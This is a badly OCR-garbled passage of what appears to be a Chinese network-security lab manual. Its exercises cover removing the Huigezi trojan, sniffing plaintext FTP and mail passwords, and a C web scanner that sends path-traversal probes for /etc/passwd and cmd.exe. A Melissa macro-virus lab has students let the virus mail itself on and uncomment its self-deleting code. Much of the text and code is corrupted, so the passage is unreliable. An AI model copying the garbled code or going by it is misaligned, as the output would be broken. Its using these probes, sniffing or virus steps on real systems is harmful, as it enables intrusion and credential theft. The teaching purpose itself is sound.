660624s￡06.-.。!=.53的能57331|]囹37!831的E2d警告:我止進程官尋我不希叟發(fā)生蝴果』包括敢搪在先加市.喧不攜定。在被察止前.進程將好有機會保存耳狀態(tài)布數(shù)據(jù),確實想終止但進程田,匚二甄二:|(4)I刪除“C:\Widnoijexplarerj(rsplorrr.rcxe匚二甄二:|(4)I刪除“C:\Widnoijexplarerj(rsplorrr.rcxe^Hackar.L.ini用hh心kb三iis&ilog^Jlrrfilns.BAK圖invn，k:g回jautccnpdafc日K沔存11%E由KE941693.lcq回UcenOc.loga e :_：ws\文件。如圖1-32所示:1KBWindowExplorerC...20C&72SBsffi972KB7+4KE：11KE：363KE：12KE11KE7KB2陽2KE6KB文件冊除H&jckdrioncn.it-.IF岳系統(tǒng)立件.如果H除，臣日T.I爵機或里行程序司篌丸.它正常工隹?茶宗凄將它移動到回收站嗎t(yī)進程甑33IJcPU便用；4%|內(nèi)存便用；1日①加KJ036664K金r顯)圖1-31：結(jié)束"”進程圖1-32：刪除“C:\Widnows\文件(5)啟動“服務”管理器。選中右側(cè)詳細列表中的“WindowsXPVista”條目，單擊右鍵，在彈出菜單中選中“屬性”菜單項，在彈出的對話框中，將“啟動類型”改為“禁用”單擊“確定”按鈕。如圖1-33所示：

WilnilMPVi>la 的屋性〔本地計隹*1J

圖1-33：禁用“WindowsXPVista”服務岸物］曾錄［原復依存美樂］理氏岸物］曾錄［原復依存美樂］理氏I取消I應用⑥(6)啟動注冊表編輯器，刪除“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsXPVista”節(jié)點。如圖1-34所示：：向印1as?，聲天n幫助岫由krTK'pa *||由Ymcnet由口「即FR口W32TmEFH口W3SUC田|_JWaiarpL3TOKA由匕Vflndmis如Utsta由口附nHttpAg1通V5優(yōu)由口Mr爐t由口山口或10我叱IJ白恤Trustm1mlWml右肺 荒里叫:打山金|匚匕門軾|[]|"|叫DisplayN日nwErrorCdritralaisl一_-r.-uLHJEG_5ZHEG_SZP￡b_5ZPJEGJWCiRDHFfZF^PAF4DA71謝小度■陜2dREG_SZPEGJWORDPEGJWORD￡聃安妻，滁這個友和期百耳子夜嗎？1香（回—圖1-34：刪除“WindowsXPVista”節(jié)點（7）重新啟動計算機。（8）主機A如果還沒卸載灰鴿子程序，可打開查看自動上線主機，已經(jīng)不存在了。如圖1-35所示:圖1-35：刪除上線主機B<實訓二明文嗅探【實訓步驟】本練習主機A、B為一組，C、D為一組，E、F為一組。下面以主機A、B為例，說明實訓步驟。首先使用“快照X”恢復Windows系統(tǒng)環(huán)境。一.獲取FTP帳戶密碼FTP協(xié)議數(shù)據(jù)包在傳輸?shù)臅r候使用明文傳輸，我們可以通過對數(shù)據(jù)包的監(jiān)聽嗅探獲得FTP帳戶的用戶名和密碼。確保主機A啟動FTP服務使得主機B能夠正常登錄。.主機A網(wǎng)絡(luò)嗅探(1)主機A(1)主機A進入實訓平臺，啟動協(xié)議分析器。如圖2-1所示:單擊工具欄”協(xié)議分析器”，圖2-1：啟動協(xié)議分析器(2)啟動協(xié)議分析器，單擊菜單“設(shè)置”1“定義過濾器”，在“定義過濾器”界面中，選擇“網(wǎng)絡(luò)地址”選項卡，設(shè)置捕獲本機IP地址與同組主機地址間的數(shù)據(jù)；選擇“協(xié)議過濾”選項卡，選中“IP”|“TCP"I“FTPControl”和“FTPData〃節(jié)點，單擊“確定”按鈕完成過濾器設(shè)置。單擊“新建捕獲窗口”按鈕，點擊“選擇過濾器”按鈕，確定過濾信息。在新建捕獲窗口工具欄中點擊”開始捕獲數(shù)據(jù)包”按鈕，開始捕獲數(shù)據(jù)包。如圖2-2和2-3所示：圖2-2:定義過濾器IP地址

定攵過騰密T干用口口回□口□國-LL「定攵過騰密T干用口口回□口□國-LL「A'l臉I(yè)取消加雕)…|另定為［目…|<圖2-3：定義過濾器協(xié)議類型.主機B遠程FTP登錄(1)主機B通過“命令提示符"FTP登錄主機A,操作如下：首先輸入：ftp主機A的IP；在出現(xiàn)User后面輸入：student；在Password后面輸入：123456,操作如圖2-4所示：圖2-4：FTP登錄成功.分析捕獲數(shù)據(jù)包((1)主機B登錄主機A成功后，主機A停止協(xié)議分析器捕獲數(shù)據(jù)包，并分析會話過程，在“會話分析”頁簽中，點擊會話交互圖上的用戶名及密碼(如圖：2-2)即可以看到主機B登陸主機A所使用的用戶名和密碼。如圖2-5所示：

圖2-5：捕獲的用戶名及密碼二.郵件傳輸中獲取郵件帳號及郵件正文.獲取郵件賬號(1)主機A配置OutlookExpress(參見附錄A—OutlookExpress配置方法)。圖2-6：主機A配置OutlookExpress(2)主機B明文嗅探主機B啟動”協(xié)議分析器”，單擊工具欄U按鈕，在“協(xié)議過濾”中設(shè)置過濾模式為僅捕獲主機A與郵件服務器之間的SMTP、POP3數(shù)據(jù)包(主機A的IP<->郵件服務器IP)。新建捕獲窗口，點擊“選擇過濾器”按鈕，確定過濾信息。在新建捕獲窗口工具欄中點擊”開始捕獲數(shù)據(jù)包”按鈕，開始捕獲數(shù)據(jù)包。如圖2-7,2-8,2-9所示：定曳過猛器k|JCFrPIGMPTCP榴妾］網(wǎng)揖地址I數(shù)據(jù)模式□□回」，；/尹FTPCcrtralFTPDataHTTP]MAPNetBtl式TCP)TELNETE}-.LOP迪KX)TPJCH3P毒嚀二攜作的…tn亂:9…另存為^…|圖2-7定曳過猛器k|JCFrPIGMPTCP榴妾］網(wǎng)揖地址I數(shù)據(jù)模式□□回」，；/尹FTPCcrtralFTPDataHTTP]MAPNetBtl式TCP)TELNETE}-.LOP迪KX)TPJCH3P毒嚀二攜作的…tn亂:9…另存為^…|圖2-7：定義過濾器協(xié)議類型定"a濤siK|瞧網(wǎng)和眥數(shù)據(jù)模式I版泡制 ]「浦俅舊地址英型(口：即可I默認LPZ.36.O,1L2 <--> 17Z,16.Q.33■=：-=<-><—>二一口<->姑盧|司村儂田捎| 崎.」|另有我⑸，，」圖2-8：定義過濾器IP地址2L過濾器信思摘要圖2-9：確定過濾信息按鈕。(3)主機A使用OutlookExpress發(fā)送郵件給主機B,點擊“發(fā)送/接收”按鈕。(4)主機B分析采集到的數(shù)據(jù)包對過濾后的數(shù)據(jù)包進行分析，提取出帳戶用戶名和密碼，以及郵件的主題。截獲的帳戶密碼如圖2-10所示：圖2-10：提取帳戶的密碼.解析郵件正文（Base64解碼）（1）在右側(cè)會話交互圖中，點擊“Text_Data”會話幀（可能存在多個Text_Data會話幀，逐一查找），在中間詳細解析樹中定位到郵件頭域（HeaderField）解析部分，找到“HeaderField=Content-Transfer-Encoding:base64,類似圖2-11,定位Base64加密后的郵件密文。QHeaderField-Ji-nSMail-rriorityInrnalD|HeaderFieLd=Ji-fliiler:HILcroscftnitlcckExpressGHD3T90.1630I-QHeaderFi^Ld二kH由eOLEProduce!ByMicrosoftMineOLEVP-.Oh1030Header7luLd=Content_7r fer_Encoding:6bltL3HeaderFieLd=K-HI^IEAuloconvertedfronlu6bitbyCServer.ITelLabinQHeaderFieLi二HeaderrLel-l=UEFSdMdSEYEqaifl_2i：［=a^ir：zLj=.二I?1?二II ._ 上圖2-11：定位郵件密文內(nèi)容（Base64編碼）（2）單擊平臺工具欄“Base64”按鈕，打開BASE64編碼轉(zhuǎn)換工具。選擇轉(zhuǎn)換方向“BASE64->Content"，選擇轉(zhuǎn)換方式“文本直接轉(zhuǎn)換”，將郵件正文（Base64編碼）輸入到“要轉(zhuǎn)換的文本”域中，單擊“轉(zhuǎn)換”按鈕，在“轉(zhuǎn)換后的文本”域中查看郵件明文。如圖2-12所示：

QqLxi軍移換的文件的交件名：I 1_1沛投后的文件名：LJI語IS擇管損才自修BA5EE4->Cwt5tCCoateat->■BASES1語此擇沛投方式r文許輯想 *立本宜捱樽想方齊城的文本：郵] ?二1加EdH.MEYT如uELd㈠切后的文本：旦制|保存|IihIIdron^ran^Ld圖2-12：編碼轉(zhuǎn)換實訓三Web漏洞掃描器&【實訓步驟】一.Web漏洞掃描程序設(shè)計編寫Web漏洞掃描器WebScan探查遠程服務器（主機）上可能存在的具有安全隱患的文件是否存在。WebScan默認提供了幾個漏洞掃描，開發(fā)人員可以根據(jù)自己的需要增加漏洞掃描的數(shù)量。WebScan的實現(xiàn)較為簡單，概括起來它主要完成下列四項工作：連接目標主機；向目標主機發(fā)送GET請求；接收目標返回的數(shù)據(jù)；根據(jù)返回數(shù)據(jù)判斷探測目標是否存在。|開發(fā)流程如圖20-3-1所示。

圖3-1WebScan開發(fā)流程(1)單擊工具欄“VC6”按鈕，啟動VC++。選擇“File"l“OpenWorkspace…”加載工程文件“C:\ExpNIS\NetAD-Lab\Projects\WebScan\"，打開源文件。（2）調(diào)用WSAStartup函數(shù)，加載Winsock庫（版本）。（3）創(chuàng)建流式套接字。（4）調(diào)用connect函數(shù)，嘗試與目標端口80建立連接，若返回SOCKET_ERROR則表示目標端口關(guān)閉，否則目標端口開放。#（5）若目標端口80開放，調(diào)用send函數(shù)發(fā)送GET請求。（6）調(diào)用recv函數(shù)接收目標返回數(shù)據(jù)，若返回數(shù)據(jù)中包含HTTP/200OK信息，則表示探測漏洞存在。（7）調(diào)用closesocket函數(shù)，關(guān)閉套接字。（8）在退出程序前卸載winsock庫。具體代碼如圖3-1，3-2所示：ttinclude<winsock.h>Upraginacnoment[1ib3"ws2_32_liti")intnaini(iintargc,char*argu[]){|ifCargcJ=2)<printf('LJspage1:scan[IPaddres￡]\n");rcturn(l);structsoctiad[lr_inblah;structhu5teint*he;3slm口T*uisaoata;，冷啃騁:華P的塔加物Mm心版本之，2int1;VORDuUersionRequested;SOCKETsack;charLUFFL1UWI」；char犍蘇門0]；ex[i]='get http/i.肌n\rr;ew[2]-"CET/bg.jpgHTTP/1.9\nXn";es[3]-"GET^bbs/index.a5pHTTF/1.B\n\n";ex[a]="GE7/upload.jsphttf^i.n\n\n"：ew[5]-"/../etc/pas5wdHTTP/1.0\n\n";px[^i]-'7sr.ripls/. ../uinnl/sysfpiu32/rLiiiil.^xp?i：+ilir-ti.HTTP/1.n\u\ii";ex[7]="/cgi-bin/test-cgi?*WTTP/1.a\n\n'';char*fn5g-"HTTP/1.1299OK";uUpr<,iiiiiRhi|iipsIpi1=I帕KFW(lRn(九？)；iF(USftStartupfullDrEianRcquostcd,printf("WinsachInitialisationrailedAn"!;PKlt(1);圖31:具體代碼esitdl;"t//在"t//在能蠲羈良倉呼融套跖sock=soeket(iiF_ihiETisocK_srREftr'ia0);blah-sin_Fapily-fiF_IHET;blah.sin_piDrt=htons(C9);blah_sLn_arldr_s_adtlr=inet_addr(argu[l]);printfC”目標主機粘argu[1]);if((tie=gotha5tbLlinaijre'(argv[1]))f=NULL){nemcpyt(char*)ftblah.siin_addr,s_addr.he->h_addr,he->b_lerjgthiJ;Bl寫叫if((blah.5in_addr.5_ad(li'-inet_addr'fai-gu[1]!)--1)<wniiEjnuptj;for(i-1;i<7;if{for(i-1;i<7;if{迄收日任返回您無 日小一1280。唯息.則裝，目標(漏洞)存在,〃任上處遍寫代碼?…if(connect(sock,(structsockdddr*)&bLahPsizeof(blah))=^0)<sendt5oclc,eK[i],5trlen(eM[i])f0);r?cu[￡(]ckvbuFfpElzeaFfbufF)so);if(str5tr(tiuFFBFni5g)!-HJLL)<prlntfC^nFound:既八cx[i]);圖32:具體代碼(9)啟動協(xié)議分析器捕獲Http會話，執(zhí)行編譯成功的掃描器，效果如圖33所示:

圖3-3:WebScan執(zhí)行效果實訓四Outlook郵件病毒【實訓步驟】[本練習主機A、B為一組，C、D為一組，E、F為一組。下面以主機A、B為例，說明實訓步驟。首先使用“快照X”恢復Windows系統(tǒng)環(huán)境。一.觀察病毒感染現(xiàn)象(1)配置Outlook2003,建立郵件帳戶，如圖4-1所示：圖4-1：新建郵件帳戶主機A、B配置Outlook2003(參見附錄A—OutlookExpress配置方法)，建立郵件帳戶。主機A打開OutLook2003,單擊“文件”1“新建”1“聯(lián)系人”，在右側(cè)的“電子郵件”欄中填入主機B的電子郵件地址，單擊左上方的“保存并關(guān)閉"完成聯(lián)系人的添加。如圖4-2所示：|

圖4-2：添加聯(lián)系人（2）查看病毒感染標記主機A打開注冊表編輯器，查看'HKEY_CURRENT_USER\Software\Microsoft\Office\"項中是否有鍵名為“Melissa”，鍵值為“...byKwyjibo”的鍵沒^^^。（3）設(shè)置發(fā)作條件觀察病毒發(fā)作現(xiàn)象主機A單擊工具欄“實訓目錄”按鈕，進入郵件病毒實訓目錄。打開病毒文檔，此時OutLook2003的安全機制會連續(xù)出現(xiàn)2個安全提示：“有一個程序正試圖訪問保存于Outlook的電子郵件地址。是否允許該操作……”，選中“允許訪問”后單擊“是”。“有一個程序正試圖以您的名義自動發(fā)送電子郵件。是否允許該操作.?…”，單擊“是”。*這樣當前文檔即被病毒自動發(fā)送給對方（當前日期數(shù)和當前時間分鐘數(shù)相同時，如當前日期為11月8日即將當前時間的分鐘數(shù)修改為08。則在文檔中輸出以下內(nèi)容“Twenty-twopoints,plustriple-word-score,plusfiftypointsforusingallmy's'mouttahere."）。如圖4-3和4-4所示：Microsoft□fficeOutlookA 有一個程序正試圖訪問保存于Outlook的電子郵件!\地址口是否允許該操偕如果對此感覺意外，這可能是由于病毒導致，您應選擇“否”口圖4-3：安全提示有一個程序正試圖以您的名義自動發(fā)送電子郵件.是否允許該操作■?如果對此感覺意外，逮苗能是由于病毒導致，您應選擇"否""■nnnnnnnnnninnnnn

是I忙二食算二二|幫助其I圖4-4：安全提示（4）重新查看病毒感染標記主機A在注冊表編輯器中按快捷鍵“F5”刷新查看，在“HKEY_CURRENT_USER\Software\Microsoft\Office\"項中是否會有鍵名為“Melissa”，鍵值為"...by吊.七。”的鍵有。如圖4-5所示：文件〔已*圖 收循央〔以幫助膽）lil-7jInternetMail-arriNews4|：lil-7jInternetMail-arriNews4|：2jJava州申二1藺hd50ftMm第cnwntCt田」REDastarTTcMls山?二］RE5EtUP(ACME)由二1RECWPPS-OMutmedlaS-^JFfetCOE"ZJ即32d--IM±>adujp白.?二J&Fix屯」H.D名痂畫盤四回|M4lss全數(shù)值名稱氫I：數(shù)值數(shù)據(jù)W：LonrmnDuHwikWord圖4-5：查看“Melissa”鍵（5）查看病毒郵件發(fā)作現(xiàn)象主機B打開Outlook2003，按“F9”鍵來接收被病毒發(fā)出的郵件，打開收件箱中的病毒郵件，雙擊附件名稱，出現(xiàn)提示信息“想要打開文件還是想將它保存到計算機中”單擊“打開”即出現(xiàn)前述Outlook2003安全提示，參照前述進行處理，病毒文檔又將被發(fā)送給B的地址簿中前50位聯(lián)系人。如圖4-6和4-7所示：出現(xiàn)提示“文件已被感染”。

項中鍵名為“Melissa”，鍵值為"...byKwyjibo”的鍵。如圖4-8所示:圖4-8：刪除“Melissa”鍵(3)調(diào)試代碼感染病毒的主機在實訓目錄C:\ExpNIS\AntiVir-Lab\Virus\MailVirus\下新建一個任意文件名的Word文件。如圖4-9所示：文曲口銅皆回/君?啖承聞訊口常秋州0后退，◎二f搜索工文件典|甲5X9區(qū)P|二匚:1日：網(wǎng)5高加荷_力中山紳密附西與群- 1 戈小I美坦 ［修改日期 ［同性竺忱竺,婀 ^LKB 2007^11-013^D ~?^J12^d0Cj ILKE： 闔ad文檔 2014T-Z111：S5A圖4-9：新建Word文件#打開新創(chuàng)建文檔的VisualBasic編輯器，找到編輯器左上部”工程一Project”工具欄中的“Project(新建Word文件名)”［"MicrosoftWord”l“ThisDocument”對象，雙擊此對象打開編輯區(qū)并將病毒代碼復制到此區(qū)域中，通過單擊“調(diào)試”1“逐語句”或者按快捷鍵“F8”來逐句調(diào)試代碼并配合代碼注釋了解其工作過程。如圖4-10所示：

圖4-10：調(diào)試代碼在調(diào)試過程中，當出現(xiàn)提示信息“此時不能進入中斷模式”時，單擊“結(jié)束”重新進行調(diào)試。如圖4-11所示：出現(xiàn)提示“此時不能進入中斷模式”圖4-11：出現(xiàn)提示信息重新開始調(diào)試后：查看病毒感染標記。觀察MicrosoftWord對象名是否有變化。觀察代碼的運行路徑是否有變化。在病毒代碼中有部分被注釋掉的語句，這些語句是病毒的自我保護措施，它們使病毒執(zhí)行完操作后將自己刪除。用戶可以去掉注釋，運行代碼查看效果。如圖4-12所示：MicrosoftWord對象名變?yōu)椤癕ellisa”。去掉代碼注釋，如圖4-13所示：

圖4-12：對象名變?yōu)椤癕ellisa圖4-13：去掉注釋代碼圖4-12：對象名變?yōu)椤癕ellisa圖4-13：去掉注釋代碼實訓五PGP應用【實訓步驟】本練習主機A、B為一組，C、D為一組，E、F為一組。首先使用“快照X”恢復Windows系統(tǒng)環(huán)境。一.PGP安全通信&說明：實訓應用PGP工具實現(xiàn)信息的安全通信，其實現(xiàn)流程為：本機首先生成公私鑰對，并導出公鑰給同組主機；在收到同組主機的公鑰后將其導入到本機中，并利用其對文件進行加密；將加密后的密文傳回給同組主機，本機利用自己的私鑰對來自同組主機的密文進行解密。要求：應用PGP工具過程中所使用的用戶名均為userGX格式，其中G為組編號(1-32),X為主機編號(A-F),如第2組主機D,其使用的用戶名應為user2D。1.生成公私密鑰（1）本機單擊實訓平臺“GnuPG”工具按鈕，進入工作目錄，鍵入命令：gpg--gen-key開始生成公私鑰對。期間gpg會依次詢問如下信息：欲產(chǎn)生密鑰種類（默認選擇1）密鑰大?。J大小2048字節(jié)）密鑰有效期限（默認選擇0一永不過期）]具體步驟結(jié)果如圖5-1所示:…￡:'■WlhDO1132\Cnid.gM@-gpg—geiirkeyundericer-tainconditions..SbbCMfileCOPVTIIGfordetails.Plea-scselect式hatkindofke學spoilwant：1yMAandEIgaJi<a1<defanIt)12)MA(sign5>胞科Signwl”Molls*-&ielection?1PBAk￡wa.iruillliavc1@24bits.ELG-EmdybEbDCween1924and4096bits1口risr.Wkiatkeysizedo劈口以wnt?調(diào)國46Rcauic.stcdhcsisiEris2EMIBbitsPleas'^^1)位cifyhen#long七h器人耳罩5huuId]□辟ua-lxd.0=diseemotesc^iris￡ii》 1 u1K看看 in n dmy方KnXr - k日y exp松崎右 in n 原日日kg<n>n = k曰y in n njuoths<n>jr - Kg廿 expires in n yeai唱Keyisu^lidfor?<0>HeydocsnotCMQpirc nilIsthi-scorrect? ?V□ll[HEEdmti±黑弁IDfcaide-n-ki.Ey期11『hiy；thesaF-twiresznnstr'ULcfcx:the-llser1DfForatlijeEe.alHam日』ConffientandEna11和ddx日&￡iothi君fDs?m："HfaiiiiP'ichHeineCDei* 好3<lheInpichl-ipLiLLe^seIdopfBde圖5-1：開始生成公私鑰對確定上述輸入后進入步驟（2）操作。（2）生成用戶標識，期間gpg會依次詢問如下信息：Realname（用戶名，請按本機的組編號和主機編號確定你的用戶名）Emailaddress（Email地址，如）Common（注釋信息，建議與用戶名相同）|確定上述輸入后，gpg會提示你將要生成的USER-ID,形如：user2D（user2D））鍵入“?！贝_定以上信息后，gpg需要一個密碼來保護即將生成的用戶私鑰，為了方便記憶，我們選擇密碼與用戶名相同。如圖5-2所示：

圖5-2：生成公私鑰對(3)接下來gpg會根據(jù)以上信息生成公私密鑰對，并將它們存放在 C:\DocumentsandSettings\Administrator\ApplicationData\gnupg目錄下，名字分別為：和。?具體步驟結(jié)果如圖5-3和5-4所示:球至 融泊 應用地〕「說明」默認情況下ApplicationData目錄是隱藏的，通過“資源瀏覽器”1“工具”菜單圖5-2：生成公私鑰對(3)接下來gpg會根據(jù)以上信息生成公私密鑰對，并將它們存放在 C:\DocumentsandSettings\Administrator\ApplicationData\gnupg目錄下，名字分別為：和。?具體步驟結(jié)果如圖5-3和5-4所示:球至 融泊 應用地〕「說明」默認情況下ApplicationData目錄是隱藏的，通過“資源瀏覽器”1“工具”菜單1”文件夾選項”1“查看”選項卡，選中“顯示所有文件和文件夾”項，即可顯示隱藏的目錄和文件。|應用到所百文件耍重查斯百丈伴巽雷)稟理至看|文件菜怨見機女件文件更視囪耳用力加■值5)|司旗設(shè)查回i.;lia件0I：兀三港三叵］UItI：可/件次。二京皿Im一天不『意面下”求斯克件夾的內(nèi)容□說危呼可F：T『泉底＜?■江〔推薦O左三「力啰汗：『之：『上□京花書渾TW不言E三卡色相「1.可展.不劭：口：；“丁回n丘西一工一二審*在□H單也因負的?:?III◎,件立固_文件要造嗅位于所白支件和豆件先RealminiBi”&mBri.s.ildditrAisiE工uiiseir2fiBCSet：JL-adb>Cn'iwii￡*userZAVouselectcdthiaUSEJR-IPs"1i-iserffl <user2ffl^CSeii?uier,lifetLflb>,RC^iciri3B加必m3耳^C^omnentp,工 二七？口VnLLRiEiisdaPa^spliiF?i^EtopFatECtywiuf1SGecretkey.胞needtogen?FAte3lotofrandombytes.Itisagoodideatopspfowotlheraction￡tyj）日ontTieknyboardLmovet-tekwusc>utilizeChedisks>dupingtheppinemeneaatiom;thisgive占t力電^andoi'inunbe^X七11修￥凈方口工盤bettieu85ha口岱喝 ^ainemctuigihenkr^py.4#4.##+##44.4####4.####+###4.4#4.4#434縣4年小4,4__鼻4鼻4鼻34縣4_縣小鼻34縣小4山44一土34縣小鼻鼻4縣縣.鼻4縣目-amdSettinkgsZflldjniinistratiQFZiRppl.icati由nIhaitd/giiiLipfrXfrHLi%tdlh.燈制；oarJtedultimate1^trustedJkeycrsatBdlamieisned.Tjig：CS/Dkiicuiwenitstra靠crenteiiSIPff=展望EWEBgSEpublicandsecpatM?neadCog白in。肚日匕。alotofpaimiioinhvCes.Itisagoodideat。pepfom歸。rmtuther1action《七打舊也”thekeybo^rdl^it舊u1看themuiiis看聲ntxlizethsdisks>duringtheprime（reriier'atimirii；tlii.^giuesttierduriidomnuFiih^rgrner-aToi*abetteiret9i^ne￡^fainismoii0hEHitriMapy-.,+#+44-.餐4#**,44+4■4.鼻4#44■鼻縣*#44■■鼻44餐*4._+4事上44■，444****#+4船上#「二EheckingtIlie-truisstdh：2 nieieded,.1cimmpl忠it史（si，neededlrPGPtrmisdisl:depths@amlid：131中口已電：9tiuist：0n.月底qOn.曲內(nèi)呼 lu:L翦4”ELI目@6翦2012-fi6-2i如yflnyeo^iiit=7A6CCPF由EFD字UW0EfiST11788F聯(lián)￡@9EK25■u&EkWfh<uE@r2A>Mm/片上1宣曲QUS蜉即曹9:1fli>Natliadb）aEkiaj^^SEBfllK3201.2-H&-214-4-k-44+4444-l-B444-l-+-k-4-k-4491咱gpsrjiub圖5-3